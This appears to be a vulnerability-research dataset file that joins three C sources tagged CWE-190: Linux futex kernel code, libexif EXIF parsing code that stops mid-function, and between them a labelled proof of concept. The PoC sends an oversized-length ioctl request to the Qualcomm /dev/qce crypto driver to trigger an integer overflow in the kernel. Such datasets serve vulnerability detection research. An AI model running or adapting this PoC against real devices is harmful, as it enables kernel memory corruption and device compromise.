struct robust_list __user *entry, *next_entry, *pending;
unsigned int limit = ROBUST_LIST_LIMIT, pi, pip;
unsigned int uninitialized_var(next_pi);
unsigned long futex_offset;
int rc;
if (!futex_cmpxchg_enabled)
return;
/*
* Fetch the list head (which was registered earlier, via
* sys_set_robust_list()):
*/
if (fetch_robust_entry(&entry, &head->list.next, &pi))
return;
/*
* Fetch the relative futex offset:
*/
if (get_user(futex_offset, &head->futex_offset))
return;
/*
* Fetch any possibly pending lock-add first, and handle it
* if it exists:
*/
if (fetch_robust_entry(&pending, &head->list_op_pending, &pip))
return;
next_entry = NULL; /* avoid warning with gcc */
while (entry != &head->list) {
/*
* Fetch the next entry in the list before calling
* handle_futex_death:
*/
rc = fetch_robust_entry(&next_entry, &entry->next, &next_pi);
/*
* A pending lock might already be on the list, so
* don't process it twice:
*/
if (entry != pending)
if (handle_futex_death((void __user *)entry + futex_offset,
curr, pi))
return;
if (rc)
return;
entry = next_entry;
pi = next_pi;
/*
* Avoid excessively long or circular lists:
*/
if (!--limit)
break;
cond_resched();
}
if (pending)
handle_futex_death((void __user *)pending + futex_offset,
curr, pip);
}
long do_futex(u32 __user *uaddr, int op, u32 val, ktime_t *timeout,
u32 __user *uaddr2, u32 val2, u32 val3)
{
int cmd = op & FUTEX_CMD_MASK;
unsigned int flags = 0;
if (!(op & FUTEX_PRIVATE_FLAG))
flags |= FLAGS_SHARED;
if (op & FUTEX_CLOCK_REALTIME) {
flags |= FLAGS_CLOCKRT;
if (cmd != FUTEX_WAIT && cmd != FUTEX_WAIT_BITSET && \
cmd != FUTEX_WAIT_REQUEUE_PI)
return -ENOSYS;
}
switch (cmd) {
case FUTEX_LOCK_PI:
case FUTEX_UNLOCK_PI:
case FUTEX_TRYLOCK_PI:
case FUTEX_WAIT_REQUEUE_PI:
case FUTEX_CMP_REQUEUE_PI:
if (!futex_cmpxchg_enabled)
return -ENOSYS;
}
switch (cmd) {
case FUTEX_WAIT:
val3 = FUTEX_BITSET_MATCH_ANY;
case FUTEX_WAIT_BITSET:
return futex_wait(uaddr, flags, val, timeout, val3);
case FUTEX_WAKE:
val3 = FUTEX_BITSET_MATCH_ANY;
case FUTEX_WAKE_BITSET:
return futex_wake(uaddr, flags, val, val3);
case FUTEX_REQUEUE:
return futex_requeue(uaddr, flags, uaddr2, val, val2, NULL, 0);
case FUTEX_CMP_REQUEUE:
return futex_requeue(uaddr, flags, uaddr2, val, val2, &val3, 0);
case FUTEX_WAKE_OP:
return futex_wake_op(uaddr, flags, uaddr2, val, val2, val3);
case FUTEX_LOCK_PI:
return futex_lock_pi(uaddr, flags, timeout, 0);
case FUTEX_UNLOCK_PI:
return futex_unlock_pi(uaddr, flags);
case FUTEX_TRYLOCK_PI:
return futex_lock_pi(uaddr, flags, NULL, 1);
case FUTEX_WAIT_REQUEUE_PI:
val3 = FUTEX_BITSET_MATCH_ANY;
return futex_wait_requeue_pi(uaddr, flags, val, timeout, val3,
uaddr2);
case FUTEX_CMP_REQUEUE_PI:
return futex_requeue(uaddr, flags, uaddr2, val, val2, &val3, 1);
}
return -ENOSYS;
}
SYSCALL_DEFINE6(futex, u32 __user *, uaddr, int, op, u32, val,
struct timespec __user *, utime, u32 __user *, uaddr2,
u32, val3)
{
struct timespec ts;
ktime_t t, *tp = NULL;
u32 val2 = 0;
int cmd = op & FUTEX_CMD_MASK;
if (utime && (cmd == FUTEX_WAIT || cmd == FUTEX_LOCK_PI ||
cmd == FUTEX_WAIT_BITSET ||
cmd == FUTEX_WAIT_REQUEUE_PI)) {
if (unlikely(should_fail_futex(!(op & FUTEX_PRIVATE_FLAG))))
return -EFAULT;
if (copy_from_user(&ts, utime, sizeof(ts)) != 0)
return -EFAULT;
if (!timespec_valid(&ts))
return -EINVAL;
t = timespec_to_ktime(ts);
if (cmd == FUTEX_WAIT)
t = ktime_add_safe(ktime_get(), t);
tp = &t;
}
/*
* requeue parameter in 'utime' if cmd == FUTEX_*_REQUEUE_*.
* number of waiters to wake in 'utime' if cmd == FUTEX_WAKE_OP.
*/
if (cmd == FUTEX_REQUEUE || cmd == FUTEX_CMP_REQUEUE ||
cmd == FUTEX_CMP_REQUEUE_PI || cmd == FUTEX_WAKE_OP)
val2 = (u32) (unsigned long) utime;
return do_futex(uaddr, op, val, tp, uaddr2, val2, val3);
}
static void __init futex_detect_cmpxchg(void)
{
#ifndef CONFIG_HAVE_FUTEX_CMPXCHG
u32 curval;
/*
* This will fail and we want it. Some arch implementations do
* runtime detection of the futex_atomic_cmpxchg_inatomic()
* functionality. We want to know that before we call in any
* of the complex code paths. Also we want to prevent
* registration of robust lists in that case. NULL is
* guaranteed to fault and we get -EFAULT on functional
* implementation, the non-functional ones will return
* -ENOSYS.
*/
if (cmpxchg_futex_value_locked(&curval, NULL, 0, 0) == -EFAULT)
futex_cmpxchg_enabled = 1;
#endif
}
static int __init futex_init(void)
{
unsigned int futex_shift;
unsigned long i;
#if CONFIG_BASE_SMALL
futex_hashsize = 16;
#else
futex_hashsize = roundup_pow_of_two(256 * num_possible_cpus());
#endif
futex_queues = alloc_large_system_hash("futex", sizeof(*futex_queues),
futex_hashsize, 0,
futex_hashsize < 256 ? HASH_SMALL : 0,
&futex_shift, NULL,
futex_hashsize, futex_hashsize);
futex_hashsize = 1UL << futex_shift;
futex_detect_cmpxchg();
for (i = 0; i < futex_hashsize; i++) {
atomic_set(&futex_queues[i].waiters, 0);
plist_head_init(&futex_queues[i].chain);
spin_lock_init(&futex_queues[i].lock);
}
return 0;
}
core_initcall(futex_init);
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_620_0 |
crossvul-cpp_data_good_2492_0 | #include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
/*
* PoC By Scott Bauer
* Bug found by derrek
*/
static const char *dev = "/dev/qce";
#define QCEDEV_MAX_KEY_SIZE 64
#define QCEDEV_MAX_IV_SIZE 32
#define QCEDEV_MAX_BUFFERS 16
struct buf_info {
union {
uint32_t offset;
uint8_t *vaddr;
};
uint32_t len;
};
struct qcedev_vbuf_info {
struct buf_info src[QCEDEV_MAX_BUFFERS];
struct buf_info dst[QCEDEV_MAX_BUFFERS];
};
struct qcedev_pmem_info {
int fd_src;
struct buf_info src[QCEDEV_MAX_BUFFERS];
int fd_dst;
struct buf_info dst[QCEDEV_MAX_BUFFERS];
};
enum qcedev_oper_enum {
QCEDEV_OPER_DEC = 0,
QCEDEV_OPER_ENC = 1,
QCEDEV_OPER_DEC_NO_KEY = 2,
QCEDEV_OPER_ENC_NO_KEY = 3,
QCEDEV_OPER_LAST
};
enum qcedev_cipher_alg_enum {
QCEDEV_ALG_DES = 0,
QCEDEV_ALG_3DES = 1,
QCEDEV_ALG_AES = 2,
QCEDEV_ALG_LAST
};
enum qcedev_cipher_mode_enum {
QCEDEV_AES_MODE_CBC = 0,
QCEDEV_AES_MODE_ECB = 1,
QCEDEV_AES_MODE_CTR = 2,
QCEDEV_AES_MODE_XTS = 3,
QCEDEV_AES_MODE_CCM = 4,
QCEDEV_DES_MODE_CBC = 5,
QCEDEV_DES_MODE_ECB = 6,
QCEDEV_AES_DES_MODE_LAST
};
struct qcedev_cipher_op_req {
uint8_t use_pmem;
union {
struct qcedev_pmem_info pmem;
struct qcedev_vbuf_info vbuf;
};
uint32_t entries;
uint32_t data_len;
uint8_t in_place_op;
uint8_t enckey[QCEDEV_MAX_KEY_SIZE];
uint32_t encklen;
uint8_t iv[QCEDEV_MAX_IV_SIZE];
uint32_t ivlen;
uint32_t byteoffset;
enum qcedev_cipher_alg_enum alg;
enum qcedev_cipher_mode_enum mode;
enum qcedev_oper_enum op;
};
#define QCEDEV_IOC_MAGIC 0x87
#define QCEDEV_IOCTL_ENC_REQ \
_IOWR(QCEDEV_IOC_MAGIC, 1, struct qcedev_cipher_op_req)
#define QCEDEV_IOCTL_DEC_REQ \
_IOWR(QCEDEV_IOC_MAGIC, 2, struct qcedev_cipher_op_req)
void thread_func(unsigned int start, unsigned int end, int fd)
{
struct qcedev_cipher_op_req req = { 0 };
unsigned int i;
char *data;
data = mmap(NULL, 0xFFFFFF * 3, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0);
if (data == MAP_FAILED) {
printf("mmap failed, get a better phone\n");
exit(0);
}
for (i = 0; i < 0xFFFFFF * 3; i += sizeof(void*))
*((unsigned long *)(data + i)) = 0xABADACC355001337;
req.in_place_op = 1;
/* setup the parameters to pass a few sanity checks */
req.entries = 2;
req.byteoffset = 15;
req.mode = QCEDEV_AES_MODE_CTR;
req.op = QCEDEV_OPER_ENC;//_NO_KEY;
req.ivlen = 1;
req.data_len = 0xFFFFFFFE;
req.vbuf.src[0].len = 4;
req.vbuf.src[1].len = 0xFFFFFFFE - 4;
req.vbuf.src[0].vaddr = (uint8_t*)data;
req.vbuf.src[1].vaddr = (uint8_t*)data;
req.vbuf.dst[0].len = 4;
req.vbuf.dst[1].len = 0xFFFFFFFE - 4;
req.vbuf.dst[0].vaddr = (uint8_t*)data;
req.vbuf.dst[1].vaddr = (uint8_t*)data;
ioctl(fd, QCEDEV_IOCTL_ENC_REQ, &req);
printf("exiting\n");
exit(0);
}
int main(void)
{
int fd;
unsigned int i;
unsigned int start = 0;
unsigned int _gap = ~0;
unsigned int gap = _gap / 8;
struct qcedev_cipher_op_req req = { 0 };
//char data[32] = { A };
char *data;
fd = open(dev, O_RDWR);
if (fd < 0) {
printf("Failed to open %s with errno %s\n", dev,
strerror(errno));
return EXIT_FAILURE;
}
thread_func(start, start + gap, fd);
sleep(1000000);
return EXIT_FAILURE;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_2492_0 |
crossvul-cpp_data_good_1433_0 | /* exif-data.c
*
* Copyright (c) 2001 Lutz Mueller <lutz@users.sourceforge.net>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the
* Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301 USA.
*/
#include <config.h>
#include <libexif/exif-mnote-data.h>
#include <libexif/exif-data.h>
#include <libexif/exif-ifd.h>
#include <libexif/exif-mnote-data-priv.h>
#include <libexif/exif-utils.h>
#include <libexif/exif-loader.h>
#include <libexif/exif-log.h>
#include <libexif/i18n.h>
#include <libexif/exif-system.h>
#include <libexif/canon/exif-mnote-data-canon.h>
#include <libexif/fuji/exif-mnote-data-fuji.h>
#include <libexif/olympus/exif-mnote-data-olympus.h>
#include <libexif/pentax/exif-mnote-data-pentax.h>
#include <math.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#undef JPEG_MARKER_SOI
#define JPEG_MARKER_SOI 0xd8
#undef JPEG_MARKER_APP0
#define JPEG_MARKER_APP0 0xe0
#undef JPEG_MARKER_APP1
#define JPEG_MARKER_APP1 0xe1
static const unsigned char ExifHeader[] = {0x45, 0x78, 0x69, 0x66, 0x00, 0x00};
struct _ExifDataPrivate
{
ExifByteOrder order;
ExifMnoteData *md;
ExifLog *log;
ExifMem *mem;
unsigned int ref_count;
/* Temporarily used while loading data */
unsigned int offset_mnote;
ExifDataOption options;
ExifDataType data_type;
};
static void *
exif_data_alloc (ExifData *data, unsigned int i)
{
void *d;
if (!data || !i)
return NULL;
d = exif_mem_alloc (data->priv->mem, i);
if (d)
return d;
EXIF_LOG_NO_MEMORY (data->priv->log, "ExifData", i);
return NULL;
}
ExifMnoteData *
exif_data_get_mnote_data (ExifData *d)
{
return (d && d->priv) ? d->priv->md : NULL;
}
ExifData *
exif_data_new (void)
{
ExifMem *mem = exif_mem_new_default ();
ExifData *d = exif_data_new_mem (mem);
exif_mem_unref (mem);
return d;
}
ExifData *
exif_data_new_mem (ExifMem *mem)
{
ExifData *data;
unsigned int i;
if (!mem)
return NULL;
data = exif_mem_alloc (mem, sizeof (ExifData));
if (!data)
return (NULL);
data->priv = exif_mem_alloc (mem, sizeof (ExifDataPrivate));
if (!data->priv) {
exif_mem_free (mem, data);
return (NULL);
}
data->priv->ref_count = 1;
data->priv->mem = mem;
exif_mem_ref (mem);
for (i = 0; i < EXIF_IFD_COUNT; i++) {
data->ifd[i] = exif_content_new_mem (data->priv->mem);
if (!data->ifd[i]) {
exif_data_free (data);
return (NULL);
}
data->ifd[i]->parent = data;
}
/* Default options */
#ifndef NO_VERBOSE_TAG_STRINGS
/*
* When the tag list is compiled away, setting this option prevents
* any tags from being loaded
*/
exif_data_set_option (data, EXIF_DATA_OPTION_IGNORE_UNKNOWN_TAGS);
#endif
exif_data_set_option (data, EXIF_DATA_OPTION_FOLLOW_SPECIFICATION);
/* Default data type: none */
exif_data_set_data_type (data, EXIF_DATA_TYPE_COUNT);
return (data);
}
ExifData *
exif_data_new_from_data (const unsigned char *data, unsigned int size)
{
ExifData *edata;
edata = exif_data_new ();
exif_data_load_data (edata, data, size);
return (edata);
}
static int
exif_data_load_data_entry (ExifData *data, ExifEntry *entry,
const unsigned char *d,
unsigned int size, unsigned int offset)
{
unsigned int s, doff;
entry->tag = exif_get_short (d + offset + 0, data->priv->order);
entry->format = exif_get_short (d + offset + 2, data->priv->order);
entry->components = exif_get_long (d + offset + 4, data->priv->order);
/* FIXME: should use exif_tag_get_name_in_ifd here but entry->parent
* has not been set yet
*/
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Loading entry 0x%x ('%s')...", entry->tag,
exif_tag_get_name (entry->tag));
/* {0,1,2,4,8} x { 0x00000000 .. 0xffffffff }
* -> { 0x000000000 .. 0x7fffffff8 } */
s = exif_format_get_size(entry->format) * entry->components;
if ((s < entry->components) || (s == 0)){
return 0;
}
/*
* Size? If bigger than 4 bytes, the actual data is not
* in the entry but somewhere else (offset).
*/
if (s > 4)
doff = exif_get_long (d + offset + 8, data->priv->order);
else
doff = offset + 8;
/* Sanity checks */
if (doff >= size) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Tag starts past end of buffer (%u > %u)", doff, size);
return 0;
}
if (s > size - doff) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Tag data goes past end of buffer (%u > %u)", doff+s, size);
return 0;
}
entry->data = exif_data_alloc (data, s);
if (entry->data) {
entry->size = s;
memcpy (entry->data, d + doff, s);
} else {
EXIF_LOG_NO_MEMORY(data->priv->log, "ExifData", s);
return 0;
}
/* If this is the MakerNote, remember the offset */
if (entry->tag == EXIF_TAG_MAKER_NOTE) {
if (!entry->data) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"MakerNote found with empty data");
} else if (entry->size > 6) {
exif_log (data->priv->log,
EXIF_LOG_CODE_DEBUG, "ExifData",
"MakerNote found (%02x %02x %02x %02x "
"%02x %02x %02x...).",
entry->data[0], entry->data[1], entry->data[2],
entry->data[3], entry->data[4], entry->data[5],
entry->data[6]);
}
data->priv->offset_mnote = doff;
}
return 1;
}
static void
exif_data_save_data_entry (ExifData *data, ExifEntry *e,
unsigned char **d, unsigned int *ds,
unsigned int offset)
{
unsigned int doff, s;
unsigned int ts;
if (!data || !data->priv)
return;
/*
* Each entry is 12 bytes long. The memory for the entry has
* already been allocated.
*/
exif_set_short (*d + 6 + offset + 0,
data->priv->order, (ExifShort) e->tag);
exif_set_short (*d + 6 + offset + 2,
data->priv->order, (ExifShort) e->format);
if (!(data->priv->options & EXIF_DATA_OPTION_DONT_CHANGE_MAKER_NOTE)) {
/* If this is the maker note tag, update it. */
if ((e->tag == EXIF_TAG_MAKER_NOTE) && data->priv->md) {
/* TODO: this is using the wrong ExifMem to free e->data */
exif_mem_free (data->priv->mem, e->data);
e->data = NULL;
e->size = 0;
exif_mnote_data_set_offset (data->priv->md, *ds - 6);
exif_mnote_data_save (data->priv->md, &e->data, &e->size);
e->components = e->size;
if (exif_format_get_size (e->format) != 1) {
/* e->format is taken from input code,
* but we need to make sure it is a 1 byte
* entity due to the multiplication below. */
e->format = EXIF_FORMAT_UNDEFINED;
}
}
}
exif_set_long (*d + 6 + offset + 4,
data->priv->order, e->components);
/*
* Size? If bigger than 4 bytes, the actual data is not in
* the entry but somewhere else.
*/
s = exif_format_get_size (e->format) * e->components;
if (s > 4) {
unsigned char *t;
doff = *ds - 6;
ts = *ds + s;
/*
* According to the TIFF specification,
* the offset must be an even number. If we need to introduce
* a padding byte, we set it to 0.
*/
if (s & 1)
ts++;
t = exif_mem_realloc (data->priv->mem, *d, ts);
if (!t) {
EXIF_LOG_NO_MEMORY (data->priv->log, "ExifData", ts);
return;
}
*d = t;
*ds = ts;
exif_set_long (*d + 6 + offset + 8, data->priv->order, doff);
if (s & 1)
*(*d + *ds - 1) = '\0';
} else
doff = offset + 8;
/* Write the data. Fill unneeded bytes with 0. Do not crash with
* e->data is NULL */
if (e->data) {
memcpy (*d + 6 + doff, e->data, s);
} else {
memset (*d + 6 + doff, 0, s);
}
if (s < 4)
memset (*d + 6 + doff + s, 0, (4 - s));
}
static void
exif_data_load_data_thumbnail (ExifData *data, const unsigned char *d,
unsigned int ds, ExifLong o, ExifLong s)
{
/* Sanity checks */
if (o >= ds) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail offset (%u).", o);
return;
}
if (s > ds - o) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail size (%u), max would be %u.", s, ds-o);
return;
}
if (data->data)
exif_mem_free (data->priv->mem, data->data);
if (!(data->data = exif_data_alloc (data, s))) {
EXIF_LOG_NO_MEMORY (data->priv->log, "ExifData", s);
data->size = 0;
return;
}
data->size = s;
memcpy (data->data, d + o, s);
}
#undef CHECK_REC
#define CHECK_REC(i) \
if ((i) == ifd) { \
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, \
"ExifData", "Recursive entry in IFD " \
"'%s' detected. Skipping...", \
exif_ifd_get_name (i)); \
break; \
} \
if (data->ifd[(i)]->count) { \
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, \
"ExifData", "Attempt to load IFD " \
"'%s' multiple times detected. " \
"Skipping...", \
exif_ifd_get_name (i)); \
break; \
}
/*! Calculate the recursion cost added by one level of IFD loading.
*
* The work performed is related to the cost in the exponential relation
* work=1.1**cost
*/
static unsigned int
level_cost(unsigned int n)
{
static const double log_1_1 = 0.09531017980432493;
/* Adding 0.1 protects against the case where n==1 */
return ceil(log(n + 0.1)/log_1_1);
}
/*! Load data for an IFD.
*
* \param[in,out] data #ExifData
* \param[in] ifd IFD to load
* \param[in] d pointer to buffer containing raw IFD data
* \param[in] ds size of raw data in buffer at \c d
* \param[in] offset offset into buffer at \c d at which IFD starts
* \param[in] recursion_cost factor indicating how expensive this recursive
* call could be
*/
static void
exif_data_load_data_content (ExifData *data, ExifIfd ifd,
const unsigned char *d,
unsigned int ds, unsigned int offset, unsigned int recursion_cost)
{
ExifLong o, thumbnail_offset = 0, thumbnail_length = 0;
ExifShort n;
ExifEntry *entry;
unsigned int i;
ExifTag tag;
if (!data || !data->priv)
return;
/* check for valid ExifIfd enum range */
if ((((int)ifd) < 0) || ( ((int)ifd) >= EXIF_IFD_COUNT))
return;
if (recursion_cost > 170) {
/*
* recursion_cost is a logarithmic-scale indicator of how expensive this
* recursive call might end up being. It is an indicator of the depth of
* recursion as well as the potential for worst-case future recursive
* calls. Since it's difficult to tell ahead of time how often recursion
* will occur, this assumes the worst by assuming every tag could end up
* causing recursion.
* The value of 170 was chosen to limit typical EXIF structures to a
* recursive depth of about 6, but pathological ones (those with very
* many tags) to only 2.
*/
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA, "ExifData",
"Deep/expensive recursion detected!");
return;
}
/* Read the number of entries */
if ((offset + 2 < offset) || (offset + 2 < 2) || (offset + 2 > ds)) {
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA, "ExifData",
"Tag data past end of buffer (%u > %u)", offset+2, ds);
return;
}
n = exif_get_short (d + offset, data->priv->order);
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Loading %hu entries...", n);
offset += 2;
/* Check if we have enough data. */
if (offset + 12 * n > ds) {
n = (ds - offset) / 12;
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Short data; only loading %hu entries...", n);
}
for (i = 0; i < n; i++) {
tag = exif_get_short (d + offset + 12 * i, data->priv->order);
switch (tag) {
case EXIF_TAG_EXIF_IFD_POINTER:
case EXIF_TAG_GPS_INFO_IFD_POINTER:
case EXIF_TAG_INTEROPERABILITY_IFD_POINTER:
case EXIF_TAG_JPEG_INTERCHANGE_FORMAT_LENGTH:
case EXIF_TAG_JPEG_INTERCHANGE_FORMAT:
o = exif_get_long (d + offset + 12 * i + 8,
data->priv->order);
/* FIXME: IFD_POINTER tags aren't marked as being in a
* specific IFD, so exif_tag_get_name_in_ifd won't work
*/
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Sub-IFD entry 0x%x ('%s') at %u.", tag,
exif_tag_get_name(tag), o);
switch (tag) {
case EXIF_TAG_EXIF_IFD_POINTER:
CHECK_REC (EXIF_IFD_EXIF);
exif_data_load_data_content (data, EXIF_IFD_EXIF, d, ds, o,
recursion_cost + level_cost(n));
break;
case EXIF_TAG_GPS_INFO_IFD_POINTER:
CHECK_REC (EXIF_IFD_GPS);
exif_data_load_data_content (data, EXIF_IFD_GPS, d, ds, o,
recursion_cost + level_cost(n));
break;
case EXIF_TAG_INTEROPERABILITY_IFD_POINTER:
CHECK_REC (EXIF_IFD_INTEROPERABILITY);
exif_data_load_data_content (data, EXIF_IFD_INTEROPERABILITY, d, ds, o,
recursion_cost + level_cost(n));
break;
case EXIF_TAG_JPEG_INTERCHANGE_FORMAT:
thumbnail_offset = o;
if (thumbnail_offset && thumbnail_length)
exif_data_load_data_thumbnail (data, d,
ds, thumbnail_offset,
thumbnail_length);
break;
case EXIF_TAG_JPEG_INTERCHANGE_FORMAT_LENGTH:
thumbnail_length = o;
if (thumbnail_offset && thumbnail_length)
exif_data_load_data_thumbnail (data, d,
ds, thumbnail_offset,
thumbnail_length);
break;
default:
return;
}
break;
default:
/*
* If we don't know the tag, don't fail. It could be that new
* versions of the standard have defined additional tags. Note that
* 0 is a valid tag in the GPS IFD.
*/
if (!exif_tag_get_name_in_ifd (tag, ifd)) {
/*
* Special case: Tag and format 0. That's against specification
* (at least up to 2.2). But Photoshop writes it anyways.
*/
if (!memcmp (d + offset + 12 * i, "\0\0\0\0", 4)) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Skipping empty entry at position %u in '%s'.", i,
exif_ifd_get_name (ifd));
break;
}
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Unknown tag 0x%04x (entry %u in '%s'). Please report this tag "
"to <libexif-devel@lists.sourceforge.net>.", tag, i,
exif_ifd_get_name (ifd));
if (data->priv->options & EXIF_DATA_OPTION_IGNORE_UNKNOWN_TAGS)
break;
}
entry = exif_entry_new_mem (data->priv->mem);
if (!entry) {
exif_log (data->priv->log, EXIF_LOG_CODE_NO_MEMORY, "ExifData",
"Could not allocate memory");
return;
}
if (exif_data_load_data_entry (data, entry, d, ds,
offset + 12 * i))
exif_content_add_entry (data->ifd[ifd], entry);
exif_entry_unref (entry);
break;
}
}
}
static int
cmp_func (const unsigned char *p1, const unsigned char *p2, ExifByteOrder o)
{
ExifShort tag1 = exif_get_short (p1, o);
ExifShort tag2 = exif_get_short (p2, o);
return (tag1 < tag2) ? -1 : (tag1 > tag2) ? 1 : 0;
}
static int
cmp_func_intel (const void *elem1, const void *elem2)
{
return cmp_func ((const unsigned char *) elem1,
(const unsigned char *) elem2, EXIF_BYTE_ORDER_INTEL);
}
static int
cmp_func_motorola (const void *elem1, const void *elem2)
{
return cmp_func ((const unsigned char *) elem1,
(const unsigned char *) elem2, EXIF_BYTE_ORDER_MOTOROLA);
}
static void
exif_data_save_data_content (ExifData *data, ExifContent *ifd,
unsigned char **d, unsigned int *ds,
unsigned int offset)
{
unsigned int j, n_ptr = 0, n_thumb = 0;
ExifIfd i;
unsigned char *t;
unsigned int ts;
if (!data || !data->priv || !ifd || !d || !ds)
return;
for (i = 0; i < EXIF_IFD_COUNT; i++)
if (ifd == data->ifd[i])
break;
if (i == EXIF_IFD_COUNT)
return; /* error */
/*
* Check if we need some extra entries for pointers or the thumbnail.
*/
switch (i) {
case EXIF_IFD_0:
/*
* The pointer to IFD_EXIF is in IFD_0. The pointer to
* IFD_INTEROPERABILITY is in IFD_EXIF.
*/
if (data->ifd[EXIF_IFD_EXIF]->count ||
data->ifd[EXIF_IFD_INTEROPERABILITY]->count)
n_ptr++;
/* The pointer to IFD_GPS is in IFD_0. */
if (data->ifd[EXIF_IFD_GPS]->count)
n_ptr++;
break;
case EXIF_IFD_1:
if (data->size)
n_thumb = 2;
break;
case EXIF_IFD_EXIF:
if (data->ifd[EXIF_IFD_INTEROPERABILITY]->count)
n_ptr++;
default:
break;
}
/*
* Allocate enough memory for all entries
* and the number of entries.
*/
ts = *ds + (2 + (ifd->count + n_ptr + n_thumb) * 12 + 4);
t = exif_mem_realloc (data->priv->mem, *d, ts);
if (!t) {
EXIF_LOG_NO_MEMORY (data->priv->log, "ExifData", ts);
return;
}
*d = t;
*ds = ts;
/* Save the number of entries */
exif_set_short (*d + 6 + offset, data->priv->order,
(ExifShort) (ifd->count + n_ptr + n_thumb));
offset += 2;
/*
* Save each entry. Make sure that no memcpys from NULL pointers are
* performed
*/
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Saving %i entries (IFD '%s', offset: %i)...",
ifd->count, exif_ifd_get_name (i), offset);
for (j = 0; j < ifd->count; j++) {
if (ifd->entries[j]) {
exif_data_save_data_entry (data, ifd->entries[j], d, ds,
offset + 12 * j);
}
}
offset += 12 * ifd->count;
/* Now save special entries. */
switch (i) {
case EXIF_IFD_0:
/*
* The pointer to IFD_EXIF is in IFD_0.
* However, the pointer to IFD_INTEROPERABILITY is in IFD_EXIF,
* therefore, if IFD_INTEROPERABILITY is not empty, we need
* IFD_EXIF even if latter is empty.
*/
if (data->ifd[EXIF_IFD_EXIF]->count ||
data->ifd[EXIF_IFD_INTEROPERABILITY]->count) {
exif_set_short (*d + 6 + offset + 0, data->priv->order,
EXIF_TAG_EXIF_IFD_POINTER);
exif_set_short (*d + 6 + offset + 2, data->priv->order,
EXIF_FORMAT_LONG);
exif_set_long (*d + 6 + offset + 4, data->priv->order,
1);
exif_set_long (*d + 6 + offset + 8, data->priv->order,
*ds - 6);
exif_data_save_data_content (data,
data->ifd[EXIF_IFD_EXIF], d, ds, *ds - 6);
offset += 12;
}
/* The pointer to IFD_GPS is in IFD_0, too. */
if (data->ifd[EXIF_IFD_GPS]->count) {
exif_set_short (*d + 6 + offset + 0, data->priv->order,
EXIF_TAG_GPS_INFO_IFD_POINTER);
exif_set_short (*d + 6 + offset + 2, data->priv->order,
EXIF_FORMAT_LONG);
exif_set_long (*d + 6 + offset + 4, data->priv->order,
1);
exif_set_long (*d + 6 + offset + 8, data->priv->order,
*ds - 6);
exif_data_save_data_content (data,
data->ifd[EXIF_IFD_GPS], d, ds, *ds - 6);
offset += 12;
}
break;
case EXIF_IFD_EXIF:
/*
* The pointer to IFD_INTEROPERABILITY is in IFD_EXIF.
* See note above.
*/
if (data->ifd[EXIF_IFD_INTEROPERABILITY]->count) {
exif_set_short (*d + 6 + offset + 0, data->priv->order,
EXIF_TAG_INTEROPERABILITY_IFD_POINTER);
exif_set_short (*d + 6 + offset + 2, data->priv->order,
EXIF_FORMAT_LONG);
exif_set_long (*d + 6 + offset + 4, data->priv->order,
1);
exif_set_long (*d + 6 + offset + 8, data->priv->order,
*ds - 6);
exif_data_save_data_content (data,
data->ifd[EXIF_IFD_INTEROPERABILITY], d, ds,
*ds - 6);
offset += 12;
}
break;
case EXIF_IFD_1:
/*
* Information about the thumbnail (if any) is saved in
* IFD_1.
*/
if (data->size) {
/* EXIF_TAG_JPEG_INTERCHANGE_FORMAT */
exif_set_short (*d + 6 + offset + 0, data->priv->order,
EXIF_TAG_JPEG_INTERCHANGE_FORMAT);
exif_set_short (*d + 6 + offset + 2, data->priv->order,
EXIF_FORMAT_LONG);
exif_set_long (*d + 6 + offset + 4, data->priv->order,
1);
exif_set_long (*d + 6 + offset + 8, data->priv->order,
*ds - 6);
ts = *ds + data->size;
t = exif_mem_realloc (data->priv->mem, *d, ts);
if (!t) {
EXIF_LOG_NO_MEMORY (data->priv->log, "ExifData",
ts);
return;
}
*d = t;
*ds = ts;
memcpy (*d + *ds - data->size, data->data, data->size);
offset += 12;
/* EXIF_TAG_JPEG_INTERCHANGE_FORMAT_LENGTH */
exif_set_short (*d + 6 + offset + 0, data->priv->order,
EXIF_TAG_JPEG_INTERCHANGE_FORMAT_LENGTH);
exif_set_short (*d + 6 + offset + 2, data->priv->order,
EXIF_FORMAT_LONG);
exif_set_long (*d + 6 + offset + 4, data->priv->order,
1);
exif_set_long (*d + 6 + offset + 8, data->priv->order,
data->size);
offset += 12;
}
break;
default:
break;
}
/* Sort the directory according to TIFF specification */
